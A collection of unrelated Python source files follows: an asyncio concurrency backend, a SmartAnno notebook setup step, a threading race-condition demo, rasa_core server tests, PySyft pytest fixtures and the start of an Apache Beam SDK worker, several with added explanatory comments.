    loop.add_writer(sock.fileno(), event.set)
    try:
        await event.wait()
    finally:
        # Our entry still present -> we own the writer registration; its
        # absence means the socket was closed while we waited.
        if _write_events.pop(sock, None) is not None:
            loop.remove_writer(sock)
            writable = True
        else:
            writable = False

    if not writable:
        raise ClosedResourceError
#
# Synchronization
#
class Lock(abc.Lock):
    """Mutex built on :class:`asyncio.Lock` with a checkpoint on acquire."""

    def __init__(self):
        self._lock = asyncio.Lock()

    def locked(self) -> bool:
        return self._lock.locked()

    async def acquire(self) -> None:
        # Checkpoint first so acquiring an uncontested lock is still a
        # cancellation point.
        await checkpoint()
        await self._lock.acquire()

    async def release(self) -> None:
        self._lock.release()
class Condition(abc.Condition):
    """Condition variable built on :class:`asyncio.Condition`."""

    def __init__(self, lock: Optional[Lock]):
        # Reuse the underlying asyncio lock of the given Lock, if any.
        asyncio_lock = lock._lock if lock else None
        self._condition = asyncio.Condition(asyncio_lock)

    async def acquire(self) -> None:
        await checkpoint()
        await self._condition.acquire()

    async def release(self) -> None:
        self._condition.release()

    def locked(self) -> bool:
        return self._condition.locked()

    async def notify(self, n=1):
        self._condition.notify(n)

    async def notify_all(self):
        self._condition.notify_all()

    async def wait(self):
        await checkpoint()
        return await self._condition.wait()
class Event(abc.Event):
    """One-shot flag built on :class:`asyncio.Event`."""

    def __init__(self):
        self._event = asyncio.Event()

    async def set(self):
        self._event.set()

    def is_set(self) -> bool:
        return self._event.is_set()

    async def wait(self):
        await checkpoint()
        await self._event.wait()
class Semaphore(abc.Semaphore):
    """Counting semaphore built on :class:`asyncio.Semaphore`."""

    def __init__(self, value: int):
        self._semaphore = asyncio.Semaphore(value)

    async def acquire(self) -> None:
        await checkpoint()
        await self._semaphore.acquire()

    async def release(self) -> None:
        self._semaphore.release()

    @property
    def value(self):
        # Reaches into asyncio's private counter; no public accessor exists.
        return self._semaphore._value
class CapacityLimiter(abc.CapacityLimiter):
    """Limiter allowing at most ``total_tokens`` concurrent borrowers.

    Waiters are served in FIFO order: each blocked borrower parks on its own
    event in ``_wait_queue`` (an OrderedDict keyed by borrower, insertion
    order == arrival order).
    """

    def __init__(self, total_tokens: float):
        self._set_total_tokens(total_tokens)
        self._borrowers: Set[Any] = set()
        # borrower -> wakeup event; insertion order is the wait order.
        self._wait_queue: Dict[Any, asyncio.Event] = OrderedDict()

    async def __aenter__(self):
        await self.acquire()

    async def __aexit__(self, exc_type: Optional[Type[BaseException]],
                        exc_val: Optional[BaseException],
                        exc_tb: Optional[TracebackType]) -> None:
        await self.release()

    def _set_total_tokens(self, value: float) -> None:
        # Validate: an int >= 1, or math.inf for "unlimited".
        if not isinstance(value, int) and not math.isinf(value):
            raise TypeError('total_tokens must be an int or math.inf')
        if value < 1:
            raise ValueError('total_tokens must be >= 1')

        self._total_tokens = value

    @property
    def total_tokens(self) -> float:
        return self._total_tokens

    async def set_total_tokens(self, value: float) -> None:
        """Change the limit, waking as many waiters as the increase allows."""
        old_value = self._total_tokens
        self._set_total_tokens(value)
        events = []
        for event in self._wait_queue.values():
            if value <= old_value:
                break

            if not event.is_set():
                events.append(event)
                old_value += 1

        for event in events:
            event.set()

    @property
    def borrowed_tokens(self) -> int:
        return len(self._borrowers)

    @property
    def available_tokens(self) -> float:
        return self._total_tokens - len(self._borrowers)

    async def acquire_nowait(self) -> None:
        await self.acquire_on_behalf_of_nowait(current_task())

    async def acquire_on_behalf_of_nowait(self, borrower) -> None:
        if borrower in self._borrowers:
            raise RuntimeError("this borrower is already holding one of this CapacityLimiter's "
                               "tokens")

        # Refuse to jump the queue: fail even when capacity exists but
        # earlier arrivals are still waiting.
        if self._wait_queue or len(self._borrowers) >= self._total_tokens:
            raise WouldBlock

        self._borrowers.add(borrower)

    async def acquire(self) -> None:
        return await self.acquire_on_behalf_of(current_task())

    async def acquire_on_behalf_of(self, borrower) -> None:
        try:
            await self.acquire_on_behalf_of_nowait(borrower)
        except WouldBlock:
            event = asyncio.Event()
            self._wait_queue[borrower] = event
            try:
                await event.wait()
            except BaseException:
                # Cancelled while waiting: leave the queue without a token.
                self._wait_queue.pop(borrower, None)
                raise

            # The releaser already removed our queue entry when it woke us.
            self._borrowers.add(borrower)

    async def release(self) -> None:
        await self.release_on_behalf_of(current_task())

    async def release_on_behalf_of(self, borrower) -> None:
        try:
            self._borrowers.remove(borrower)
        except KeyError:
            raise RuntimeError("this borrower isn't holding any of this CapacityLimiter's "
                               "tokens") from None

        # Notify the next task in line if this limiter has free capacity now
        if self._wait_queue and len(self._borrowers) < self._total_tokens:
            # Bug fix: pop the OLDEST waiter (FIFO).  A bare popitem() pops
            # the most recently added entry (LIFO), starving early arrivals
            # and contradicting the "next task in line" contract above.
            event = self._wait_queue.popitem(last=False)[1]
            event.set()
def current_default_thread_limiter():
    """Return the limiter capping the default worker thread pool."""
    return _default_thread_limiter


# At most 40 concurrent default worker threads.
_default_thread_limiter = CapacityLimiter(40)
#
# Operating system signals
#
@asynccontextmanager
async def open_signal_receiver(*signals: int):
    """Async context manager yielding an async generator of received signal
    numbers for the given *signals*."""
    async def process_signal_queue():
        # Endless stream of signal numbers as they arrive on the queue.
        while True:
            signum = await queue.get()
            yield signum

    loop = get_running_loop()
    queue = asyncio.Queue()  # type: asyncio.Queue[int]
    handled_signals = set()
    agen = process_signal_queue()
    try:
        for sig in set(signals):
            loop.add_signal_handler(sig, queue.put_nowait, sig)
            handled_signals.add(sig)

        yield agen
    finally:
        await agen.aclose()
        # Only remove handlers that were actually installed (installation
        # may have failed partway through the loop above).
        for sig in handled_signals:
            loop.remove_signal_handler(sig)
#
# Testing and debugging
#
def _create_task_info(task: asyncio.Task) -> TaskInfo:
    """Build a :class:`TaskInfo` from a task and its recorded state (if any)."""
    task_state = _task_states.get(task)
    if task_state is None:
        # Task was not spawned through a task group; fall back to the native
        # task name where the runtime supports it.
        name = task.get_name() if _native_task_names else None  # type: ignore
        parent_id = None
    else:
        name = task_state.name
        parent_id = task_state.parent_id

    return TaskInfo(id(task), parent_id, name, task._coro)  # type: ignore
async def get_current_task() -> TaskInfo:
    """Return info about the task calling this function."""
    return _create_task_info(current_task())  # type: ignore
async def get_running_tasks() -> List[TaskInfo]:
    """Return info for every task on this loop that has not finished."""
    return [_create_task_info(task) for task in all_tasks() if not task.done()]
async def wait_all_tasks_blocked() -> None:
    """Poll until every other task on the loop is blocked on an await.

    Used by the testing utilities: repeatedly inspects each task's coroutine
    chain and sleeps briefly while any task is still runnable.
    """
    this_task = current_task()
    while True:
        for task in all_tasks():
            if task is this_task:
                continue

            # Get the thing the task's coroutine is currently awaiting on.
            if isgenerator(task._coro):  # type: ignore
                awaitable = task._coro.gi_yieldfrom  # type: ignore
            else:
                awaitable = task._coro.cr_await  # type: ignore

            # If the first awaitable is None, the task has not started running yet
            task_running = bool(awaitable)

            # Consider any task doing sleep(0) as not being blocked
            while asyncio.iscoroutine(awaitable):
                # Walk down the await chain, handling both generator-based
                # and native coroutines.
                if isgenerator(awaitable):
                    code = awaitable.gi_code
                    f_locals = awaitable.gi_frame.f_locals
                    awaitable = awaitable.gi_yieldfrom
                else:
                    code = awaitable.cr_code
                    f_locals = awaitable.cr_frame.f_locals
                    awaitable = awaitable.cr_await

                if code is asyncio.sleep.__code__ and f_locals['delay'] == 0:
                    task_running = False
                    break

            if not task_running:
                # At least one task is not genuinely blocked; back off and
                # rescan from the top.
                await sleep(0.1)
                break
        else:
            return
class TestRunner(abc.TestRunner):
    """Drives async test functions on a dedicated asyncio event loop."""

    def __init__(self, debug: bool = False, use_uvloop: bool = True,
                 policy: Optional[asyncio.AbstractEventLoopPolicy] = None):
        _maybe_set_event_loop_policy(policy, use_uvloop)
        self._loop = asyncio.new_event_loop()
        self._loop.set_debug(debug)
        asyncio.set_event_loop(self._loop)

    def _cancel_all_tasks(self):
        # Cancel every task still pending on the loop and surface any
        # non-cancellation exception they died with.
        to_cancel = all_tasks(self._loop)
        if not to_cancel:
            return

        for task in to_cancel:
            task.cancel()

        # NOTE(review): the ``loop=`` argument to asyncio.gather() was
        # removed in Python 3.10 -- confirm the supported interpreter range.
        self._loop.run_until_complete(
            asyncio.gather(*to_cancel, loop=self._loop, return_exceptions=True))

        for task in to_cancel:
            if task.cancelled():
                continue
            if task.exception() is not None:
                raise task.exception()

    def close(self) -> None:
        """Tear down the loop: cancel leftovers, close async generators."""
        try:
            self._cancel_all_tasks()
            self._loop.run_until_complete(self._loop.shutdown_asyncgens())
        finally:
            asyncio.set_event_loop(None)
            self._loop.close()

    def call(self, func: Callable[..., Awaitable], *args, **kwargs):
        """Run ``func(*args, **kwargs)`` to completion on this runner's loop."""
        return self._loop.run_until_complete(func(*args, **kwargs))
|
IntroStep.py | from threading import Thread
from IPython.core.display import clear_output, display
from ipywidgets import widgets
from SmartAnno.utils.ConfigReader import ConfigReader
from SmartAnno.gui.BranchingWidgets import BranchingStep
from SmartAnno.models.GloveModel import GloveModel
class IntroStep(BranchingStep):
    """First workflow step: collects Glove model and UMLS API-key settings,
    then branches into "start over" or "continue reviewing"."""

    def __init__(self, description='', name=None):
        # Previously saved settings, if any (None when unset).
        self.glove_path = ConfigReader.getValue('glove/model_path')
        self.glove_vocab = ConfigReader.getValue('glove/vocab')
        self.glove_vector = ConfigReader.getValue('glove/vector')
        # widgets to take the user inputs
        self.glove_path_input = None
        self.glove_vocab_input = None
        self.glove_vector_input = None
        self.api_key_input = None
        # Defaults matching the standard Glove download.
        if self.glove_vocab is None:
            self.glove_vocab = 1900000
        if self.glove_vector is None:
            self.glove_vector = 300
        self.html = widgets.HTML(value=description)
        super().__init__(name)
        pass

    def start(self):
        """Render this step: two branch buttons plus the settings form."""
        self.branch_buttons = [widgets.Button(description=d, layout=widgets.Layout(width='150px', left='100px')) for d
                               in
                               ['StartOver', 'ContinueReviewing']]
        clear_output()
        self.box = self.createBox()
        display(self.box)
        pass

    def navigate(self, button):
        """Persist any entered settings, then jump to step 1 according to
        which branch button was clicked."""
        if self.glove_path_input is not None:
            self.saveGloveConfig()
        if self.api_key_input is not None:
            self.saveAPIKey()
        else:
            # No input widget was shown, so a key already exists in config.
            self.workflow.api_key = ConfigReader.getValue("api_key")
        self.backgroundWork()
        if button.description == 'ContinueReviewing':
            self.workflow.to_continue = True
            self.workflow.steps[1].start()
            self.workflow.steps[1].complete()
        else:
            self.workflow.to_continue = False
            self.workflow.steps[1].start()
        pass

    def complete(self):
        # Completing this step behaves like clicking the first button
        # ('StartOver').
        self.navigate(self.branch_buttons[0])
        pass

    def saveGloveConfig(self):
        """Copy the Glove form values into config and persist them."""
        self.glove_path = self.glove_path_input.value
        self.glove_vocab = self.glove_vocab_input.value
        self.glove_vector = self.glove_vector_input.value
        self.workflow.glove_path = self.glove_path
        ConfigReader.setValue("glove/vocab", int(self.glove_vocab))
        ConfigReader.setValue("glove/vector", int(self.glove_vector))
        ConfigReader.setValue("glove/model_path", self.glove_path)
        ConfigReader.saveConfig()
        pass

    def saveAPIKey(self):
        """Persist the UMLS API key and expose it on the workflow."""
        ConfigReader.setValue("api_key", self.api_key_input.value)
        ConfigReader.saveConfig()
        self.workflow.api_key = self.api_key_input.value
        pass

    def createBox(self):
        """Assemble the full widget layout for this step."""
        rows = self.addSeparator()
        rows += [self.html]
        # These two append input widgets only when config values are missing.
        self.requestWELocation(rows)
        self.requestUMLSAPIKey(rows)
        rows += self.addSeparator() + self.addConditions()
        # print('\n'.join([str(row) for row in rows]))
        vbox = widgets.VBox(rows, layout=widgets.Layout(display='flex', flex_grown='column'))
        return vbox

    def addConditions(self):
        # Wire both branch buttons to navigate() and lay them out in a row.
        for button in self.branch_buttons:
            button.on_click(self.navigate)
        return [widgets.HBox(self.branch_buttons, layout=widgets.Layout(left='10%', width='80%'))]

    def backgroundWork(self):
        # Load the Glove model on a background thread so the UI stays
        # responsive.
        thread_gm = Thread(target=self.prepareGloveModel)
        thread_gm.start()
        pass

    def prepareGloveModel(self):
        # GloveModel caches itself on construction; the instance is not kept.
        GloveModel(word2vec_file=self.glove_path, vocab=self.glove_vocab, vect=self.glove_vector)
        pass

    def requestWELocation(self, rows):
        """Append Glove path/vocab/vector inputs when no path is configured."""
        if self.glove_path is None or len(self.glove_path.strip()) == 0:
            rows += self.addSeparator()
            rows.append(
                widgets.HTML(value='<h4>Set up your Glove model</h4><p>In order to use word embedding, you need '
                                   'to tell where the glove model locates:</p><p>If you have not downloaded yet,'
                                   'you can download it from <a href="https://nlp.stanford.edu/projects/glove/" '
                                   ' target="_blank">Glove Site</a><p>. Once you download it, you need to unzip it'
                                   ' and copy the unzipped file path here. SmartAnno will automatically convert it '
                                   'into binary format (will be loaded faster). If you do not set it up, the word '
                                   'embedding synonym extender will be <b>skipped</b>.</p>'))
            self.glove_path_input = widgets.Text(
                value='',
                placeholder='copy and paste your glove model file location here',
                description='',
                disabled=False,
                layout=widgets.Layout(width='70%')
            )
            self.glove_vocab_input = widgets.Text(value=str(self.glove_vocab),
                                                  placeholder='',
                                                  description='', disabled=False)
            self.glove_vector_input = widgets.Text(value=str(self.glove_vector),
                                                   placeholder='the vector size of the glove model',
                                                   description='', disabled=False)
            rows.append(self.glove_path_input)
            rows.append(widgets.HTML(value='The vocabulary size of the glove model:'))
            rows.append(self.glove_vocab_input)
            rows.append(widgets.HTML(value='The vector size of the glove model:'))
            rows.append(self.glove_vector_input)
            rows += self.addSeparator()
        pass

    def requestUMLSAPIKey(self, rows):
        """Append a UMLS API-key input when no key is configured."""
        api_key = ConfigReader.getValue("api_key")
        if api_key is None or len(api_key) == 0:
            rows.append(
                widgets.HTML(
                    value='<h4>Set your API Key</h4><p>In order to use the UMLS synonym checking module, you need to set'
                          ' up your API key: (<a href="https://www.nlm.nih.gov/research/umls/user_education/quick_tours/'
                          'UTS-API/UTS_REST_API_Authentication.html" target="_blank">How to get your API Key_at 01:12 from'
                          ' beginning. </a>)</p><p>If you do not set the api key, the UMLS synonym extender will be '
                          '<b>skipped</b>.</p>'))
            self.api_key_input = widgets.Text(value='',
                                              placeholder='',
                                              description='', disabled=False)
            rows.append(self.api_key_input)
            rows += self.addSeparator()
|
basic.py | import threading as th
# NOTE(review): `lock` is created but never acquired -- the four threads
# mutate the shared global `x` unsynchronized, which is why the sample
# outputs recorded below differ between runs.  Presumably this is an
# intentional race-condition demo; if not, wrap each update in `with lock:`.
lock=th.Lock()
x=0

def a():
    # Decrement the shared counter 10000 times, then print its value.
    global x
    for i in range(10000):
        x-=2
    print(x)

def b():
    # Increment the shared counter 10000 times, then print its value.
    global x
    for i in range(10000):
        x+=2
    print(x)

def c():
    global x
    for i in range(10000):
        x-=3
    print(x)

def d():
    global x
    for i in range(10000):
        x+=3
    print(x)

l=[a,b,c,d]
# Start all four workers.  There is no join(), so the final print below may
# run before the threads finish -- another source of varying output.
for i in l:
    t=th.Thread(target=i)
    t.start()
print(x)
'''
output1:
-20000
0-30000
00
output2:
15000
-30000
0
0
output3:
-20000
0
-30000
0
0
'''
|
test_server.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import os
import signal
import uuid
from multiprocessing import Process
import pytest
from builtins import str
from freezegun import freeze_time
import rasa_core
from rasa_core import server, events
from rasa_core.actions.action import ACTION_LISTEN_NAME
from rasa_core.agent import Agent
from rasa_core.channels import UserMessage
from rasa_core.channels.direct import CollectingOutputChannel
from rasa_core.events import (
UserUttered, BotUttered, SlotSet, TopicSet, Event, ActionExecuted)
from rasa_core.interpreter import RegexInterpreter
from rasa_core.policies.augmented_memoization import \
AugmentedMemoizationPolicy
from rasa_core.remote import RasaCoreClient, RemoteAgent
from tests.conftest import DEFAULT_STORIES_FILE
# a couple of event instances that we can use for testing
# (mixed payload types -- int, str, None, list -- deliberately exercise
# event (de)serialisation round-trips)
test_events = [
    Event.from_parameters({"event": UserUttered.type_name,
                           "text": "/goodbye",
                           "parse_data": {
                               "intent": {
                                   "confidence": 1.0, "name": "greet"},
                               "entities": []}
                           }),
    BotUttered("Welcome!", {"test": True}),
    TopicSet("question"),
    SlotSet("cuisine", 34),
    SlotSet("cuisine", "34"),
    SlotSet("location", None),
    SlotSet("location", [34, "34", None]),
]
@pytest.fixture(scope="module")
def http_app(core_server):
    """Run the core server in a child process and yield its base URL."""
    p = Process(target=core_server.run, args=("0.0.0.0", 1234))
    p.daemon = True
    p.start()
    yield "http://0.0.0.0:1234"
    # SIGKILL: the dev server exposes no graceful shutdown hook here.
    os.kill(p.ident, signal.SIGKILL)
    p.join()
@pytest.fixture(scope="module")
def core_server(tmpdir_factory):
    """Train a small agent once per module and build the Flask app for it."""
    model_path = tmpdir_factory.mktemp("model").strpath

    agent = Agent("data/test_domains/default_with_topic.yml",
                  policies=[AugmentedMemoizationPolicy(max_history=3)])

    training_data = agent.load_data(DEFAULT_STORIES_FILE)
    agent.train(training_data)
    agent.persist(model_path)

    return server.create_app(model_path,
                             interpreter=RegexInterpreter())
@pytest.fixture(scope="module")
def app(core_server):
    """In-process Flask test client for the core server."""
    return core_server.test_client()
def test_root(app):
    """The index endpoint answers 200 with a hello message."""
    response = app.get("http://dummy/")
    body = response.get_data(as_text=True)
    assert response.status_code == 200 and body.startswith("hello")
def test_version(app):
    """/version reports the installed rasa_core version."""
    response = app.get("http://dummy/version")
    payload = response.get_json()
    assert response.status_code == 200
    assert payload.get("version") == rasa_core.__version__
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(app):
    """An unknown conversation id yields a fresh tracker with one listen
    event (time frozen so the event timestamp is deterministic)."""
    response = app.get("http://dummy/conversations/madeupid/tracker")
    content = response.get_json()
    assert response.status_code == 200
    assert content["paused"] is False
    assert content["slots"] == {"location": None, "cuisine": None}
    assert content["sender_id"] == "madeupid"
    assert content["events"] == [{"event": "action",
                                 "name": "action_listen",
                                 "timestamp": 1514764800}]
    assert content["latest_message"] == {"text": None,
                                         "intent": {},
                                         "entities": []}
def test_continue_on_non_existent_conversation(app):
    """Continuing an unknown conversation creates it and predicts listen."""
    data = json.dumps({"events": [], "executed_action": None})
    response = app.post("http://dummy/conversations/myid/continue",
                        data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200
    assert content["next_action"] == "action_listen"
    # events are not echoed back on /continue responses
    assert content["tracker"]["events"] is None
    assert content["tracker"]["paused"] is False
    assert content["tracker"]["sender_id"] == "myid"
    assert content["tracker"]["slots"] == {"location": None, "cuisine": None}
    assert content["tracker"]["latest_message"] == {"text": None,
                                                    "intent": {},
                                                    "entities": []}
def test_parse(app):
    """Parsing '/greet' predicts the greeting utterance as next action."""
    data = json.dumps({"query": "/greet"})
    response = app.post("http://dummy/conversations/myid/parse",
                        data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200
    assert content["next_action"] == "utter_greet"
    assert content["tracker"]["events"] is None
    assert content["tracker"]["paused"] is False
    assert content["tracker"]["sender_id"] == "myid"
    assert content["tracker"]["slots"] == {"location": None, "cuisine": None}
    assert content["tracker"]["latest_message"]["text"] == "/greet"
    # RegexInterpreter yields full confidence for slash intents.
    assert content["tracker"]["latest_message"]["intent"] == {
        "confidence": 1.0,
        "name": "greet"}
def test_continue(app):
    """After uttering the greeting, /continue predicts listening again."""
    data = json.dumps({"query": "/greet"})
    response = app.post("http://dummy/conversations/myid/parse",
                        data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200

    # Report the greeting as executed and ask for the next action.
    data = json.dumps({"events": [], "executed_action": "utter_greet"})
    response = app.post("http://dummy/conversations/myid/continue",
                        data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200
    assert content["next_action"] == "action_listen"
    assert content["tracker"]["events"] is None
    assert content["tracker"]["paused"] is False
    assert content["tracker"]["sender_id"] == "myid"
    assert content["tracker"]["slots"] == {"location": None, "cuisine": None}
    assert content["tracker"]["latest_message"]["text"] == "/greet"
    assert content["tracker"]["latest_message"]["intent"] == {
        "confidence": 1.0,
        "name": "greet"}
@pytest.mark.parametrize("event", test_events)
def test_pushing_events(app, event):
    """Each event type survives a POST to /tracker/events and a readback."""
    # Fresh conversation id so runs don't interfere with each other.
    cid = str(uuid.uuid1())
    conversation = "http://dummy/conversations/{}".format(cid)

    data = json.dumps({"query": "/greet"})
    response = app.post("{}/parse".format(conversation),
                        data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200

    data = json.dumps({"events": [], "executed_action": "utter_greet"})
    response = app.post("{}/continue".format(conversation),
                        data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200

    data = json.dumps([event.as_dict()])
    response = app.post("{}/tracker/events".format(conversation),
                        data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200

    tracker_response = app.get("http://dummy/conversations/{}/tracker"
                               "".format(cid))
    tracker = tracker_response.get_json()
    assert tracker is not None
    # 4 events from the greet exchange + the one we pushed.
    assert len(tracker.get("events")) == 5

    evt = tracker.get("events")[4]
    assert Event.from_parameters(evt) == event
def test_put_tracker(app):
    """PUT replaces the tracker's events wholesale and they round-trip."""
    data = json.dumps([event.as_dict() for event in test_events])
    response = app.put("http://dummy/conversations/pushtracker/tracker",
                       data=data, content_type='application/json')
    content = response.get_json()
    assert response.status_code == 200
    assert len(content["events"]) == len(test_events)
    assert content["sender_id"] == "pushtracker"

    tracker_response = app.get("http://dummy/conversations/pushtracker/tracker")
    tracker = tracker_response.get_json()
    assert tracker is not None
    evts = tracker.get("events")
    assert events.deserialise_events(evts) == test_events
def test_list_conversations(app):
    """After talking to a conversation, its id shows up in the listing."""
    data = json.dumps({"query": "/greet"})
    response = app.post("http://dummy/conversations/myid/parse",
                        data=data, content_type='application/json')
    assert response.status_code == 200

    response = app.get("http://dummy/conversations")
    content = response.get_json()
    assert response.status_code == 200
    assert len(content) > 0
    assert "myid" in content
def test_remote_client(http_app, default_agent, tmpdir):
    """A RemoteAgent loaded from a persisted model should process a message
    through the remote core server and leave the expected event sequence
    on the conversation tracker."""
    model_path = tmpdir.join("persisted_model").strpath
    default_agent.persist(model_path)
    remote_agent = RemoteAgent.load(model_path,
                                    http_app)
    message = UserMessage("""/greet{"name":"Rasa"}""",
                          output_channel=CollectingOutputChannel())
    remote_agent.process_message(message)
    tracker = remote_agent.core_client.tracker_json("default")
    # listen -> user utterance -> slot set -> utter action -> bot utterance
    # -> listen again
    assert len(tracker.get("events")) == 6
    # listen
    assert tracker["events"][0]["name"] == "action_listen"
    # this should be the utterance
    assert tracker["events"][1]["text"] == """/greet{"name":"Rasa"}"""
    # set slot event (the entity from the /greet payload)
    assert tracker["events"][2]["value"] == "Rasa"
    # utter action
    assert tracker["events"][3]["name"] == "utter_greet"
    # this should be the bot utterance
    assert tracker["events"][4]["text"] == "hey there Rasa!"
    # listen
    assert tracker["events"][5]["name"] == "action_listen"
def test_remote_status(http_app):
    """The status endpoint reports the running rasa_core version."""
    status = RasaCoreClient(http_app, None).status()
    assert status.get("version") == rasa_core.__version__
def test_remote_clients(http_app):
    """A freshly parsed conversation id appears in the client listing."""
    core_client = RasaCoreClient(http_app, None)
    conversation_id = str(uuid.uuid1())
    core_client.parse("/greet", conversation_id)
    assert conversation_id in core_client.clients()
def test_remote_append_events(http_app):
    """Appended events land on the tracker right after the initial listen."""
    core_client = RasaCoreClient(http_app, None)
    conversation_id = str(uuid.uuid1())
    core_client.append_events_to_tracker(conversation_id, test_events[:2])

    tracker = core_client.tracker_json(conversation_id)
    expected = [ActionExecuted(ACTION_LISTEN_NAME)] + test_events[:2]
    assert events.deserialise_events(tracker.get("events")) == expected
|
conftest.py | import builtins
from multiprocessing import Process
import sys
import time
import pytest
import torch
import syft
from syft import TorchHook
from syft.workers import WebsocketClientWorker
from syft.workers import WebsocketServerWorker
def _start_proc(participant, dataset: str = None, **kwargs):  # pragma: no cover
    """Spin up a websocket participant in its own process.

    Args:
        participant: Worker class to instantiate inside the child process.
        dataset: Optional ``(data, key)`` pair registered on the worker
            before it starts serving.
        **kwargs: Forwarded to the ``participant`` constructor.

    Returns:
        The started ``multiprocessing.Process``.
    """

    def _run_participant():
        worker = participant(**kwargs)
        if dataset is not None:
            data, key = dataset
            worker.add_dataset(data, key=key)
        worker.start()

    process = Process(target=_run_participant)
    process.start()
    return process
def instantiate_websocket_client_worker(max_tries=5, sleep_time=0.1, **kwargs):  # pragma: no cover
    """Instantiate the websocket client, retrying refused connections.

    If a connection is refused we wait ``sleep_time`` seconds and try again.
    After ``max_tries`` failed retries the ConnectionRefusedError is
    propagated to the caller.
    """
    failed_attempts = 0
    while True:
        try:
            return WebsocketClientWorker(**kwargs)
        except ConnectionRefusedError:
            if failed_attempts >= max_tries:
                raise
            failed_attempts += 1
            time.sleep(sleep_time)
@pytest.fixture()
def start_proc():  # pragma: no cover
    # Expose the module-level _start_proc helper as a fixture so tests can
    # spawn websocket participants in separate processes.
    return _start_proc
@pytest.fixture()
def start_remote_worker():  # pragma: no cover
    """Helper fixture for starting a websocket worker.

    Returns a factory that launches a WebsocketServerWorker in a child
    process and connects a WebsocketClientWorker proxy to it, sharing the
    same id/host/port/hook arguments for both sides.
    """
    def _start_remote_worker(
        id, hook, dataset: str = None, host="localhost", port=8768, max_tries=5, sleep_time=0.01
    ):
        kwargs = {"id": id, "host": host, "port": port, "hook": hook}
        # The dataset (if any) only lives on the server side.
        server = _start_proc(WebsocketServerWorker, dataset=dataset, **kwargs)
        # Retry until the server process is accepting connections.
        remote_proxy = instantiate_websocket_client_worker(
            max_tries=max_tries, sleep_time=sleep_time, **kwargs
        )
        return server, remote_proxy
    return _start_remote_worker
@pytest.fixture(scope="session", autouse=True)
def hook():
    """Session-wide TorchHook, created once and shared by all tests."""
    return TorchHook(torch)
@pytest.fixture(scope="function", autouse=True)
def workers(hook):
    """Provides a fresh set of virtual workers for every test and removes
    them from the local worker's registry on teardown."""
    # To run a plan locally the local worker can't be a client worker,
    # since it needs to register objects
    # LaRiffle edit: doing this increases the reference count on pointers and
    # breaks the auto garbage collection for pointer of pointers, see #2150
    # hook.local_worker.is_client_worker = False

    # Reset the hook and the local worker so state from a previous test
    # cannot leak into this one.
    syft.local_worker.clear_objects()
    syft.frameworks.torch.hook.hook_args.hook_method_args_functions = {}
    syft.frameworks.torch.hook.hook_args.hook_method_response_functions = {}
    syft.frameworks.torch.hook.hook_args.get_tensor_type_functions = {}

    # Define 4 virtual workers
    alice = syft.VirtualWorker(id="alice", hook=hook, is_client_worker=False)
    bob = syft.VirtualWorker(id="bob", hook=hook, is_client_worker=False)
    charlie = syft.VirtualWorker(id="charlie", hook=hook, is_client_worker=False)
    james = syft.VirtualWorker(id="james", hook=hook, is_client_worker=False)

    workers = {
        "me": hook.local_worker,
        "alice": alice,
        "bob": bob,
        "charlie": charlie,
        "james": james,
    }

    yield workers

    # Teardown: deregister the virtual workers created above.
    alice.remove_worker_from_local_worker_registry()
    bob.remove_worker_from_local_worker_registry()
    charlie.remove_worker_from_local_worker_registry()
    james.remove_worker_from_local_worker_registry()
@pytest.fixture
def hide_module():
    """Temporarily make 'tensorflow', 'tf_encrypted' (and, for plain import
    statements, 'torch') appear uninstalled; restores the real import
    machinery on teardown."""
    import_orig = builtins.__import__
    # When we check for imports in dependency_check, we don't actually attempt
    # to import each package, so popping a module from sys.modules and mocking
    # the import statement is not sufficient to simulate the dependency check
    # for when the dependency is absent. The way we check for dependencies
    # (importlib.util.find_spec) uses module Finders in the sys.meta_path when
    # checking for module specs, so we need to mock the find_spec method of the
    # Finder that will discover the module we want to hide. That Finder happens
    # to be in position three of the meta path.
    # NOTE(review): the meta_path index is interpreter-version dependent —
    # confirm position 3 still holds on the targeted Python version.
    find_spec_orig = sys.meta_path[3].find_spec
    def mocked_import(name, globals, locals, fromlist, level):
        # Pretend these packages cannot be imported.
        if name in ["tensorflow", "tf_encrypted", "torch"]:
            raise ImportError()
        return import_orig(name, globals, locals, fromlist, level)
    def mocked_find_spec(self, fullname, target=None):
        # NOTE(review): since the replacement is assigned onto the finder
        # object itself, 'self' appears to receive the module name at call
        # time (hence the membership test on 'self') — verify this matches
        # how the patched finder is invoked.
        if self in ["tensorflow", "tf_encrypted"]:
            return None
        return find_spec_orig(self, fullname, target)
    builtins.__import__ = mocked_import
    sys.meta_path[3].find_spec = mocked_find_spec
    yield
    # Teardown: restore the untouched import machinery.
    builtins.__import__ = import_orig
    sys.meta_path[3].find_spec = find_spec_orig
|
sdk_worker.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import logging
import queue
import sys
import threading
import time
import traceback
from builtins import object
from builtins import range
from concurrent import futures
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
class SdkHarness(object):
  """SDK-side of the Fn API control plane.

  Receives instructions from the runner over the control channel and
  dispatches them to a pool of SdkWorkers, streaming responses back on the
  same bidirectional call.
  """

  REQUEST_METHOD_PREFIX = '_request_'
  # Warn when a bundle has waited longer than this to be scheduled.
